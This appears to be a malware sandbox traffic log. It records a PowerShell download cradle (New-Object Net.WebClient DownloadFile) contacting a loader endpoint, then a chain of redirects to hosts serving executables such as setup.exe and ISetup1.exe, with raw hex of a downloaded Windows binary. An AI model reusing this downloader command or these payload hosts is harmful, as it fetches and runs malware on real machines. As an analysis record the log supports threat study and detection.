-Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/
2024-04-26 15:10:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	108.157.172.96	443	5428	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:10:57 UTC	96	OUT	GET /load/th.php?c=1000 HTTP/1.1 Host: d68kcn56pzfb4.cloudfront.net Connection: Keep-Alive
2024-04-26 15:10:57 UTC	372	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: nginx/1.10.1 Date: Fri, 26 Apr 2024 15:10:57 GMT X-Powered-By: PHP/5.5.38 X-Cache: Miss from cloudfront Via: 1.1 ad49ff8ff03d68efb9eb939751d77c56.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-P3 X-Amz-Cf-Id: -y91UBgjZdNwlQAjbiqmAfYn6HOyIDeSsSyW-tX7mQBQ_w3Nm41RpA==
2024-04-26 15:10:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	108.157.172.96	443	5268	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:10:58 UTC	103	OUT	GET /load/dl.php?id=425&c=1000 HTTP/1.1 Host: d68kcn56pzfb4.cloudfront.net Connection: Keep-Alive
2024-04-26 15:10:59 UTC	432	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: nginx/1.10.1 Date: Fri, 26 Apr 2024 15:10:59 GMT X-Powered-By: PHP/5.5.38 Location: http://185.172.128.59/ISetup1.exe X-Cache: Miss from cloudfront Via: 1.1 b2d81f0349dd7259d5dfb1b35b379c6c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-P3 X-Amz-Cf-Id: 9iBP57px4C3IL7Qi7U9EmDfI6wMvHWotzaE8Mi-JShenPkxFggMdfw==
2024-04-26 15:10:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	108.157.172.96	443	6980	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:02 UTC	132	OUT	GET /load/dl.php?id=444 HTTP/1.1 User-Agent: InnoDownloadPlugin/1.5 Host: d68kcn56pzfb4.cloudfront.net Connection: Keep-Alive
2024-04-26 15:11:03 UTC	454	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: nginx/1.10.1 Date: Fri, 26 Apr 2024 15:11:02 GMT X-Powered-By: PHP/5.5.38 Location: http://240216234727901.mjj.xne26.cfd/f/fvgbm0216901.txt X-Cache: Miss from cloudfront Via: 1.1 e759cef9ef04dc6632a71818dfac3a76.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-P3 X-Amz-Cf-Id: uVyo1DgCfnYnl9-knXj1rVkFRfXe9r7RFdSgJYnC6-3GQEuCWo9OQQ==
2024-04-26 15:11:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49721	108.157.172.96	443	6188	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:14 UTC	96	OUT	GET /load/dl.php?id=456 HTTP/1.1 Host: d68kcn56pzfb4.cloudfront.net Connection: Keep-Alive
2024-04-26 15:11:14 UTC	439	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: nginx/1.10.1 Date: Fri, 26 Apr 2024 15:11:14 GMT X-Powered-By: PHP/5.5.38 Location: https://monoblocked.com/385128/setup.exe X-Cache: Miss from cloudfront Via: 1.1 5f040b97224682b7d52e78e15b9d27ce.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MIA3-P3 X-Amz-Cf-Id: _ucAmGoToyFeTxPfpPJTkmdWMrumRG3bdp29bnuTLnd4Fnwrbl3_Gg==
2024-04-26 15:11:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49723	45.130.41.108	443	6188	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:16 UTC	81	OUT	GET /385128/setup.exe HTTP/1.1 Host: monoblocked.com Connection: Keep-Alive
2024-04-26 15:11:16 UTC	240	IN	HTTP/1.1 301 Moved Permanently Server: nginx-reuseport/1.21.1 Date: Fri, 26 Apr 2024 15:11:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 327 Connection: close Location: https://c.574859385.xyz/385128/setup.exe
2024-04-26 15:11:16 UTC	327	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 35 37 34 38 35 39 33 38 35 2e 78 79 7a 2f 33 38 35 31 32 38 2f 73 65 74 75 70 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://c.574859385.xyz/385128/setup.exe">here</a>.</p><hr><address>Apache/2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49724	37.221.125.202	443	6188	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:17 UTC	81	OUT	GET /385128/setup.exe HTTP/1.1 Host: c.574859385.xyz Connection: Keep-Alive
2024-04-26 15:11:18 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 15:11:17 GMT Content-Type: application/octet-stream Content-Length: 6655374 Last-Modified: Fri, 26 Apr 2024 15:00:33 GMT Connection: close ETag: "662bc191-658d8e" Accept-Ranges: bytes
2024-04-26 15:11:18 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSL
2024-04-26 15:11:18 UTC	16384	IN	Data Raw: 0c 8b 45 b8 c1 e8 04 a8 01 75 22 32 db ff 75 c0 e8 7f ef ff ff ff 75 dc e8 77 ef ff ff ff 75 e8 e8 6f ef ff ff 83 c4 0c e9 92 00 00 00 ff 75 c0 c6 45 fc 01 e8 5b ef ff ff 59 8d 45 dc 8d 4d e8 50 e8 2c d2 ff ff 3b 75 ec 0f 8d 81 00 00 00 8b 55 e8 8d 44 72 02 66 8b 08 66 3b cf 74 09 66 85 c9 74 0c 40 40 eb ef 2b c2 d1 f8 8b f0 eb 03 83 ce ff 85 f6 7d 03 8b 75 ec 8d 45 d0 56 50 8d 4d e8 e8 ac d2 ff ff 8b 08 c6 45 fc 04 e8 03 fe ff ff 8a d8 c6 45 fc 01 ff 75 d0 f6 db 1a db fe c3 e8 ef ee ff ff 84 db 59 74 9c 32 db ff 75 dc e8 e0 ee ff ff 8b 55 e8 59 52 e8 d6 ee ff ff 59 8b 4d f4 5f 8a c3 5e 5b 64 89 0d 00 00 00 00 c9 c3 b3 01 eb d8 56 8b f1 33 d2 e8 b6 fc ff ff 84 c0 75 02 5e c3 56 ff 15 f8 b0 41 00 85 c0 0f 95 c0 5e c3 55 8b ec 83 ec 0c 80 3d 48 31 42 00 00 Data Ascii: Eu"2uuwuouE[YEMP,;uUDrff;tft@@+}uEVPMEEuYt2uUYRYM_^[dV3u^VA^U=H1B
2024-04-26 15:11:18 UTC	16384	IN	Data Raw: ff ff 89 7d fc e8 b0 ad ff ff e9 56 ff ff ff 8b 45 e0 66 89 5d c8 66 89 5d ca 8b 40 0c 8b 74 88 fc 8b 06 8d 7d c8 57 52 8b 08 50 89 55 fc ff 51 20 3b c3 0f 85 ba 01 00 00 66 83 7d c8 13 0f 85 29 03 00 00 8b 06 8b 7d d0 8d 55 c4 8b 08 52 50 ff 51 14 3b c3 0f 85 98 01 00 00 3b 7d c4 0f 83 09 03 00 00 83 4d fc ff 8d 4d c8 e8 bc d2 ff ff 89 5d f0 8b 06 8d 55 f0 52 68 28 b2 41 00 8b 08 50 c7 45 fc 02 00 00 00 ff 11 85 c0 8b 45 f0 0f 85 cf 02 00 00 3b c3 0f 84 c7 02 00 00 89 5d ec 8b 08 8d 55 ec 52 57 50 c6 45 fc 03 ff 51 0c 85 c0 8b 45 ec 0f 85 a1 02 00 00 3b c3 0f 84 99 02 00 00 89 5d e8 8b 08 8d 55 e8 52 68 f8 b2 41 00 50 c6 45 fc 04 ff 11 3b c3 8b 45 e8 0f 85 70 02 00 00 3b c3 0f 84 68 02 00 00 8d 4d 88 e8 a6 02 00 00 8d 45 8c 8b ce 50 57 c6 45 fc 05 e8 63 Data Ascii: }VEf]f]@t}WRPUQ ;f})}URPQ;;}MM]URh(APEE;]URWPEQE;]URhAPE;Ep;hMEPWEc
2024-04-26 15:11:18 UTC	16384	IN	Data Raw: b2 41 00 ff 75 0c e8 bd 69 00 00 83 c4 0c 85 c0 75 12 8b 4d 10 8b 45 08 50 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 49 6f ff ff 59 33 c0 5e c2 04 00 b8 5f a3 41 00 e8 f0 6d 00 00 51 56 8b f1 89 75 f0 83 65 fc 00 8d 4e 10 e8 1e 00 00 00 8b 76 08 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 ac a3 41 00 e8 b5 6d 00 00 51 56 8b f1 89 75 f0 8d 8e ac 01 00 00 c7 45 fc 04 00 00 00 e8 f5 76 ff ff 8d 8e 98 01 00 00 c6 45 fc 03 e8 e6 76 ff ff 8d 8e 84 01 00 00 c6 45 fc 02 e8 d7 76 ff ff 8d 8e 70 01 00 00 c6 45 fc 01 e8 c8 76 ff ff 80 65 fc 00 8d 8e 58 01 00 00 e8 b9 76 ff ff 83 4d fc ff 8b ce e8 0d 00 00 00 8b 4d f4 5e 64 89 0d 00 Data Ascii: AuiuMEPQ3@]Vt$NFutVIoY3^_AmQVueNvMtVPM^dAmQVuEvEvEvpEveXvMM^d
2024-04-26 15:11:18 UTC	16384	IN	Data Raw: c7 40 04 24 b5 41 00 c7 40 08 60 b8 41 00 89 48 0c 89 48 10 89 88 a0 00 00 00 89 48 14 88 88 90 00 00 00 88 88 91 00 00 00 c7 80 b4 00 00 00 00 00 10 00 c7 80 b8 00 00 00 00 00 40 00 88 88 c0 00 00 00 c7 00 24 b9 41 00 c7 40 04 14 b9 41 00 c7 40 08 00 b9 41 00 89 88 a4 00 00 00 89 48 1c 89 48 18 89 48 34 89 48 30 c3 55 8b ec 56 8b 75 0c 6a 10 68 4c b9 41 00 56 e8 4a 29 00 00 83 c4 0c 85 c0 75 0a 8b 4d 10 8b 45 08 89 01 eb 59 6a 10 68 a8 b2 41 00 56 e8 2c 29 00 00 83 c4 0c 85 c0 74 e2 6a 10 68 98 b2 41 00 56 e8 18 29 00 00 83 c4 0c 85 c0 75 0a 8b 45 08 8b c8 8d 50 04 eb 1c 6a 10 68 48 b2 41 00 56 e8 fa 28 00 00 83 c4 0c 85 c0 75 1d 8b 45 08 8b c8 8d 50 08 f7 d9 1b c9 23 ca 8b 55 10 89 0a 8b 08 50 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5e 5d c2 0c 00 8b 44 24 Data Ascii: @$A@`AHHH@$A@A@AHHH4H0UVujhLAVJ)uMEYjhAV,)tjhAV)uEPjhHAV(uEP#UPQ3@^]D$
2024-04-26 15:11:19 UTC	16384	IN	Data Raw: ff 68 e0 b9 41 00 68 2c 4a 41 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 58 53 56 57 89 65 e8 ff 15 74 b0 41 00 33 d2 8a d4 89 15 d0 33 42 00 8b c8 81 e1 ff 00 00 00 89 0d cc 33 42 00 c1 e1 08 03 ca 89 0d c8 33 42 00 c1 e8 10 a3 c4 33 42 00 6a 01 e8 96 0e 00 00 59 85 c0 75 08 6a 1c e8 c3 00 00 00 59 e8 48 09 00 00 85 c0 75 08 6a 10 e8 b2 00 00 00 59 33 f6 89 75 fc e8 b7 2a 00 00 ff 15 78 b0 41 00 a3 3c 5a 42 00 e8 75 29 00 00 a3 40 33 42 00 e8 1e 27 00 00 e8 60 26 00 00 e8 bb 20 00 00 89 75 d0 8d 45 a4 50 ff 15 7c b0 41 00 e8 f1 25 00 00 89 45 9c f6 45 d0 01 74 06 0f b7 45 d4 eb 03 6a 0a 58 50 ff 75 9c 56 56 ff 15 80 b0 41 00 50 e8 30 c4 fe ff 89 45 a0 50 e8 a9 20 00 00 8b 45 ec 8b 08 8b 09 89 4d 98 50 51 e8 3b 24 00 00 59 59 c3 8b 65 e8 ff 75 98 Data Ascii: hAh,JAdPd%XSVWetA33B3B3B3BjYujYHujY3u*xA<ZBu)@3B'`& uEP\|A%EEtEjXPuVVAP0EP EMPQ;$YYeu
2024-04-26 15:11:19 UTC	16384	IN	Data Raw: 85 94 00 00 00 39 5d 18 75 08 a1 4c 35 42 00 89 45 18 53 53 ff 75 10 ff 75 0c 8b 45 20 f7 d8 1b c0 83 e0 08 40 50 ff 75 18 ff 15 a8 b0 41 00 89 45 e0 3b c3 74 63 89 5d fc 8d 3c 00 8b c7 83 c0 03 24 fc e8 70 b1 ff ff 89 65 e8 8b f4 89 75 dc 57 53 56 e8 40 f2 ff ff 83 c4 0c eb 0b 6a 01 58 c3 8b 65 e8 33 db 33 f6 83 4d fc ff 3b f3 74 29 ff 75 e0 56 ff 75 10 ff 75 0c 6a 01 ff 75 18 ff 15 a8 b0 41 00 3b c3 74 10 ff 75 14 50 56 ff 75 08 ff 15 00 b0 41 00 eb 02 33 c0 8d 65 cc 8b 4d f0 64 89 0d 00 00 00 00 5f 5e 5b c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 33 c0 50 50 50 50 50 50 50 50 8b 55 0c 8d 49 00 8a 02 0a c0 74 07 42 0f ab 04 24 eb f3 8b 75 08 83 c9 ff 90 41 8a 06 0a c0 74 07 46 0f a3 04 24 73 f2 8b c1 83 c4 20 5e c9 c3 cc cc 55 8b ec 56 33 c0 50 Data Ascii: 9]uL5BESSuuE @PuAE;tc]<$peuWSV@jXe33M;t)uVuujuA;tuPVuA3eMd_^[UV3PPPPPPPPUItB$uAtF$s ^UV3P
2024-04-26 15:11:19 UTC	16384	IN	Data Raw: 01 00 00 00 a4 99 41 00 01 00 00 00 ac 99 41 00 01 00 00 00 b4 99 41 00 00 00 00 00 bc 99 41 00 ff ff ff ff c4 99 41 00 20 05 93 19 01 00 00 00 50 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d8 99 41 00 20 05 93 19 01 00 00 00 78 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ec 99 41 00 20 05 93 19 02 00 00 00 a0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 9a 41 00 00 00 00 00 0a 9a 41 00 20 05 93 19 01 00 00 00 d0 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 1c 9a 41 00 20 05 93 19 01 00 00 00 f8 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 9a 41 00 20 05 93 19 01 00 00 Data Ascii: AAAAA PAA xAA AAA AA A0A
2024-04-26 15:11:19 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-26 15:11:19 UTC	16384	IN	Data Raw: 2c 74 6e 52 4c 90 a0 e4 92 9c 91 dd 20 ae 88 bd 98 ca 8a 98 40 6a d8 ec d3 af 8a f7 31 70 b5 1f bc 62 27 f8 97 29 2f 45 f6 5e 28 51 bb 66 a2 dc 71 e8 f4 49 28 5a 44 c4 67 ab 31 0b 4a bb 7e b5 0a 5d 84 96 cb e9 ee 1d 71 ba a6 e9 75 c5 a1 f9 d9 24 cd 00 8a ad 3a 89 3a 7d 8c 21 d4 ea 6e dd ce 21 ff 17 26 df 41 7d 74 f9 21 db 8d 06 5e 86 4d 80 49 1d f3 e6 65 67 2f af 8e b0 69 5e c9 88 87 23 36 25 77 b8 65 38 e6 06 56 e1 37 9e 23 a4 63 e6 06 76 07 6a 3d 22 38 5f 7e 5b 23 d9 15 52 98 8e bd db a1 ad 0b 81 a8 ba 6e c5 9b d4 ac 30 5c 02 61 d2 71 a1 27 40 28 3d 51 41 c2 bf a6 5d 84 43 a6 1c ea 7b bf a4 92 07 38 46 0f 34 cc a7 77 3e 2b f0 db 77 56 c1 cf f4 9e af 66 04 db 65 b7 3b 88 2c 40 4a cc bc f8 7d 35 89 3d f1 ad e2 26 a3 9a d7 65 5f 58 3b 61 a2 f9 40 be 8d 6e Data Ascii: ,tnRL @j1pb')/E^(QfqI(ZDg1J~]qu$::}!n!&A}t!^MIeg/i^#6%we8V7#cvj="8_~[#Rn0\aq'@(=QA]C{8F4w>+wVfe;,@J}5=&e_X;a@n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49730	192.178.50.36	443	6252	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 15:11:31 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 15:11:32 UTC	1703	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 15:11:32 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-o-yyJdMBrvp706pDpdtqWA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-26 15:11:32 UTC	720	IN	Data Raw: 32 63 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 62 6c 69 7a 7a 61 72 64 20 62 6c 69 7a 7a 63 6f 6e 22 2c 22 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22 2c 22 77 72 65 78 68 61 6d 20 77 65 73 74 20 63 6f 61 73 74 20 74 6f 75 72 22 2c 22 73 6c 61 63 6b 20 73 74 65 77 61 72 74 20 62 75 74 74 65 72 66 69 65 6c 64 22 2c 22 65 73 63 61 70 65 20 66 72 6f 6d 20 74 61 72 6b 6f 76 20 75 6e 68 65 61 72 64 20 65 64 69 74 69 6f 6e 22 2c 22 72 65 66 75 6e 64 73 20 66 6f 72 20 64 65 6c 61 79 65 64 20 66 6c 69 67 68 74 73 22 2c 22 66 69 72 73 74 20 72 6f 75 6e 64 20 6e 66 6c 20 64 72 61 66 74 20 72 65 73 75 6c 74 73 22 2c 22 6e 61 73 61 20 6d 61 72 73 20 73 70 69 64 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c Data Ascii: 2c9)]}'["",["blizzard blizzcon","daily horoscope today","wrexham west coast tour","slack stewart butterfield","escape from tarkov unheard edition","refunds for delayed flights","first round nfl draft results","nasa mars spiders"],["","","","","","","",
2024-04-26 15:11:32 UTC	1255	IN	Data Raw: 61 32 38 0d 0a 52 46 46 33 54 6b 64 6e 4f 46 42 48 61 6d 4e 73 53 48 6c 56 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 65 6d 4d 7a 54 6e 70 6a 4d 30 35 36 59 7a 4e 4f 4c 79 39 42 51 55 4a 46 53 55 46 46 51 55 46 52 51 55 31 43 53 57 64 42 51 30 56 52 52 55 52 46 55 55 67 76 65 45 46 42 59 30 46 42 51 55 4e 42 5a 30 31 43 51 56 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 52 55 4a 52 54 55 64 42 55 55 6c 49 51 30 46 45 4c 33 68 42 51 58 70 46 51 55 46 44 51 56 46 4e 51 30 46 33 56 55 64 43 55 56 56 42 51 55 46 42 51 55 46 42 51 55 4a 42 5a 30 31 42 51 6b 4a 46 52 6b 56 70 52 58 Data Ascii: a28RFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBY0FBQUNBZ01CQVFBQUFBQUFBQUFBQUFBRUJRTUdBUUlIQ0FEL3hBQXpFQUFDQVFNQ0F3VUdCUVVBQUFBQUFBQUJBZ01BQkJFRkVpRX
2024-04-26 15:11:32 UTC	1255	IN	Data Raw: 35 75 65 54 5a 6c 62 46 6c 55 62 32 4e 43 64 57 39 73 57 45 74 33 4d 6b 64 36 5a 56 70 77 55 56 68 56 59 6b 64 4c 5a 56 6f 32 4d 54 42 69 4f 45 5a 35 64 47 70 78 4d 6e 46 4d 54 33 6c 6f 4d 32 64 71 4d 6b 78 75 4e 48 4e 4e 4d 6d 4e 6c 56 31 49 32 4d 58 6c 31 53 7a 6c 6c 54 30 39 51 61 56 4a 75 61 6d 35 78 5a 6b 64 74 56 6e 5a 6c 4e 55 4e 6f 64 6d 55 33 64 53 39 4f 56 56 68 4b 4e 47 6b 34 56 44 42 6d 4d 6d 68 53 5a 46 51 77 53 46 56 4d 52 6a 52 61 62 46 63 32 64 46 70 4a 4d 56 6c 4d 62 6b 63 31 56 47 63 34 53 7a 68 32 55 48 64 6f 54 45 56 5a 55 46 68 33 63 6e 42 6c 61 44 6c 32 5a 46 4a 30 65 45 5a 49 5a 6e 70 36 57 48 52 76 5a 33 64 44 52 30 46 73 56 43 73 30 4c 30 59 35 5a 56 42 71 57 46 41 72 4d 55 4e 53 63 48 46 47 4d 30 78 61 64 45 6b 35 63 6b 78 4a 57 Data Ascii: 5ueTZlbFlUb2NCdW9sWEt3Mkd6ZVpwUVhVYkdLZVo2MTBiOEZ5dGpxMnFMT3loM2dqMkxuNHNNMmNlV1I2MXl1SzllT09QaVJuam5xZkdtVnZlNUNodmU3dS9OVVhKNGk4VDBmMmhSZFQwSFVMRjRabFc2dFpJMVlMbkc1VGc4Szh2UHdoTEVZUFh3cnBlaDl2ZFJ0eEZIZnp6WHRvZ3dDR0FsVCs0L0Y5ZVBqWFArMUNScHFGM0xadEk5ckxJW
